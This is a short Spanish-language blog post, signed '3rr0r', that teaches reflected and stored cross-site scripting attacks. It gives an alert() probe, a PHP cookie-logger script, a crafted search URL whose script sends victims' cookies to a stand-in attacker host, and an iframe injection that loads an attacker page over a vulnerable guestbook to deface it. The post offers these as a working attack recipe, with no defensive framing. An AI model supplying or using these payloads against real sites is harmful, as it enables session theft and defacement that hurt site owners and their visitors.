Hay dos formas para poder usar este ataque: a un buscador, o a otro tipo de formulario (un libro de visitas o un tag por ejemplo)
Buscador:
Lo primero encontrar un buscador, para saber si es vulnerable introducir el siguiente código:
<script>alert(hola)</script>
Si es vulnerables, saldrá un ventana que pondrá hola, en caso contrario no saldrá nada.
Si vulnerable, el siguiente paso es ver el name del buscador y del botón de búsqueda.
<input type="text" name="palabra"> que será el formulario.
<input type="submit" name="buscar" value="Buscar"> que será el boton.
La caja de texto donde ponemos lo que vamos a buscar se llama palabra y el botón buscar.
Ahora lo que hay que hacer es almacenar las cookies en un archivo d texto para ello creamos un archivo PHP que contenga el siguiente código.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=cookies.php-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Código:
##################################
# <? #
# $cookie = $_GET['cookie']; #
# $fff = fopen("cookie.txt","a");#
# fwrite($fff, "$cookie \n"); #
# fclose($fff); #
# ?> #
##################################
lo que hace este código es guardar la cookie en un archivo txt que se llama cookie.txt.
Una vez hecho este paso solo tenemos que crear URL que ejecute a cookie.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-= | * Código: * | =-=-=-=-=-=
http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
=-=-=-=-=-= | * Formulario: * | =-=-=-=-=-=
Buscamos un libro de visitas o un tag y probamos que sea vulnerable:
#############################
<script>alert(hola)</script>
#############################
Si es vulnerable, creamos un archivo PHP que se llama owned.php (por ejemplo) y introducimos el siguiente código (ademas de lo que se quiera poner en el nuevo index) en fichero owned:
##################################
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>
##################################
Este codigo hace que se el IFRAME la pagina principal. Despues en la caja de texto del formularios vulnerable ponemos lo suiguiente:
<iframe src=http://www.atacante.org/owned.php>
Con esto hacemos que cuando alguien linkea a el formulario automaticamenta carga nuestro owned.php y lo pone como pagina principal.
######################################################################
Editado por 3rr0r
Cap comentari:
Publica un comentari a l'entrada